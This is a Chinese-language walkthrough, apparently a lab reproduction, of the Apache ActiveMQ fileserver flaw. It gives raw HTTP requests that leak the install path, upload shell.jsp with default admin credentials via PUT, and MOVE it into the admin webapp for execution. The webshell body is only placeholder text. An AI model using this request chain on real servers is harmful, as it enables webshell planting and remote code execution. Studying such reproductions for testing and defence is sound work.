1、启用不安全的http方法 a. 产生原因
>1.ActiveMQ默认开启PUT MOVE等不安全的http方法 >2.ActiveMQ的file server允许客户通过PUT上传文件b. 复现利用
1.刷新页面抓包,放入repeater里,构造poyload,测试是否存在漏洞 2.payload原理:PUT一个不存在的文件目录,file server会返回文件的绝对路径
PUT /fileserver/a../..//.././ HTTP/1.1 Host: ip:8161 Authorization: Basic YWRtaW46YWRtaW4= Content-Length: 4 test结果: 返回包中泄露了文件路径
3.通过PUT方式向files ever中写入一个测试文件
PUT /fileserver/shell.jsp HTTP/1.1 Host: ip:8161 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 Authorization: Basic YWRtaW46YWRtaW4= Content-Length: 26 this is jsp webshell code. //(文件内容)结果:
4.查看本地文件
5.通过MOVE将文件移动到admin目录下
MOVE /fileserver/shell.jsp HTTP/1.1 Destination:file:文件绝对路径/webapps/admin/shell.jsp Host: ip:8161 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 Authorization: Basic YWRtaW46YWRtaW4= Content-Length: 17 Content-Length: 06.查看admin目录
7.测试MOVE方法的原因:
>1.练习MOVE方法的使用 >2.上传shell时,file server中是没有执行权限的,需要移动到admin中才能执行shell结束。。。。。